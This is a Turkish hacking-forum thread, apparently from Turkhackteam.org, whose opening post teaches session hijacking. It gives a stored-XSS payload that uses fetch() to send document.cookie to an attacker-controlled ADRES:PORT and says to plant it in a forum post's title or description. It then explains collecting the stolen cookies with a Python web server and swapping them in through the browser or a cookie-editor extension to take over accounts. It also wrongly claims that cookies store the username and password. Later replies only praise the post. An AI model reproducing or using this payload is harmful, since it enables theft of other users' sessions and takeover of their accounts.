Session Hijacking(Cookie Saldırıları)

12 Eyl 2023
79
30
Herkes en az bir kez karşılaşmıştır bu cookilerle sağda solda biryerlerde çıkar insanı rahatsız ettirir ve zorla kendini kabul ettirir :D

Cookie örneği vericek olursa şöyle varsayalım: Facebook'a giriş yaptınız çıktınız ve tekrar girdiğiniz, girdiğinizde sizden ne şifre nede kullanıcı adı istedi bunun sebebi tarayıcımıza kaydedilen cookie'dir kullanıcı adı ve şifren cookie'de durur ve sen bu siteye istek attığında cookie'lerde istekle beraber gider.
Eğer başka birinin cookie bilgisini alırsak o kişi üzerinden işlem yapabiliriz.

Başka bir örnek verelim bir forum sitesine giriş yaptınız ve post paylaştınız. Bu şekilde bu posta bir tuzak yerleştirebiliriz. Bunun için bir script kullanıcağız, scriptimiz bu
Kod:
<script> fetch("http://ADRES:PORT/"+document.cookie) </script>
bu scripti postun başlığına, açıklamasına yerleştirebiliriz. Bunları yaptıktan sonra posta tıklayan kişilerin cookie bilgileri bizim web sunucumuza gelicektir yani
Kod:
ADRES:PORT
yazan kısma.

Kod:
ADRES:PORT
kısmında ne yapıcağınızı şaşırdıysanız `python -m http.server 80` komutunu kullanabilirsiniz. Bu komut bulunduğunuz dizinin web halidir. Ee bizim cookie'ler nerede dicek olursanız cookie'ler terminal ekranına düşücektir.

Bu cookie'leri kullanarak hesaplara giriş yapmak için F12 tuşuna basıp token kısmından tokeni değişebilirsiniz. Cookie Editor gibi eklentilerde kullanılabilir.
 

'Anka

Basın&Medya Ekibi Kıdemli
8 Eyl 2021
3,464
2,635
Merhaba,

"Session Hijacking ve Cookie Saldırıları" başlığı altında konu açman, önemli bir konuyu gündeme getirmeni takdir ediyorum. Bu tür güvenlik açıkları hakkında bilgi paylaşımı yaparak diğer üyeleri bilinçlendirmek, siber güvenlik konusunda daha güçlü bir topluluk oluşturmamıza katkı sağlar diye düşünüyorum. Ek olarak, konuya görsel eklemen ve renkli bir anlatımla desteklenmiş daha iyi bir paylaşım yapmanıza yardımcı olabilir. Görseller, konuyu daha iyi anlatmana ve diğer üyelerin daha kolay takip etmelerini sağlamana yardımcı olur. Tekrardan teşekkür ederiz ve siber güvenlik alanında bilgi paylaşımına devam ettiğin için takdirimi sunarım devamını dilerim.

Saygılarımla,
'Anka
 
12 Eyl 2023
79
30
Merhaba,

"Session Hijacking ve Cookie Saldırıları" başlığı altında konu açman, önemli bir konuyu gündeme getirmeni takdir ediyorum. Bu tür güvenlik açıkları hakkında bilgi paylaşımı yaparak diğer üyeleri bilinçlendirmek, siber güvenlik konusunda daha güçlü bir topluluk oluşturmamıza katkı sağlar diye düşünüyorum. Ek olarak, konuya görsel eklemen ve renkli bir anlatımla desteklenmiş daha iyi bir paylaşım yapmanıza yardımcı olabilir. Görseller, konuyu daha iyi anlatmana ve diğer üyelerin daha kolay takip etmelerini sağlamana yardımcı olur. Tekrardan teşekkür ederiz ve siber güvenlik alanında bilgi paylaşımına devam ettiğin için takdirimi sunarım devamını dilerim.

Saygılarımla,
'Anka
Merhaba;
Güzel İçerik Fakat Daha Çok Detay Vermeye Çalış Yazını Renklendir Ve Resimler İle Süsle Okurlar Bunları Önemser, Eline Sağlık.
Eyvallah
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.